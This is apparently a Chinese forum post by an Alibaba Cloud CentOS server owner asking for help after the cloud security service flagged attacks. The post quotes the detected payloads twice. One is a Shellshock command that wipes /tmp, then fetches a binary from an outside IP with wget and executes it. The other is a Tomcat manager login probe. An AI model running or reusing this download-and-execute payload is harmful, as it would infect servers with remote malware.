服务器是阿里云的ECS,系统是centos 6.5 x64,阿里云盾检测到一次“代码 /命令执行”类型的攻击,攻击特征如下:
我的 IP/ Match1:{ :; }; /bin/bash -c .rm -rf /tmp/*;echo wget http://222.174.5.7:1552/hhu -o /tmp/china.z-mvrw. >> /tmp/run.sh;echo echo by china.z >> /tmp/run.sh;echo chmod 777 /tmp/china.z-mvrw. >> /tmp/run.sh;echo /tmp/china.z-mvrw. >> /tmp/run.sh;echo rm -rf /tmp/run.sh >> /tmp/run.sh;chmod 777 /tmp/run.sh;/tmp/run.sh.
还有这样的:
我的 IP/manager/html Match1:/manager/html Match2:get /manager/html http/1.1..content-type: text/html..host: 我的 ip..accept: text/html, */*..user-agent: mozilla/3.0 (compatible; indy library)..authorization: basic og==
请问这样的情况下,我改怎么检查我的服务器,实在不知道要怎么处理了。
/tmp 目录下 200 多个这种类型的文件。
我的 IP/ Match1:{ :; }; /bin/bash -c .rm -rf /tmp/*;echo wget http://222.174.5.7:1552/hhu -o /tmp/china.z-mvrw. >> /tmp/run.sh;echo echo by china.z >> /tmp/run.sh;echo chmod 777 /tmp/china.z-mvrw. >> /tmp/run.sh;echo /tmp/china.z-mvrw. >> /tmp/run.sh;echo rm -rf /tmp/run.sh >> /tmp/run.sh;chmod 777 /tmp/run.sh;/tmp/run.sh.
还有这样的:
我的 IP/manager/html Match1:/manager/html Match2:get /manager/html http/1.1..content-type: text/html..host: 我的 ip..accept: text/html, */*..user-agent: mozilla/3.0 (compatible; indy library)..authorization: basic og==
请问这样的情况下,我改怎么检查我的服务器,实在不知道要怎么处理了。
/tmp 目录下 200 多个这种类型的文件。
Select Language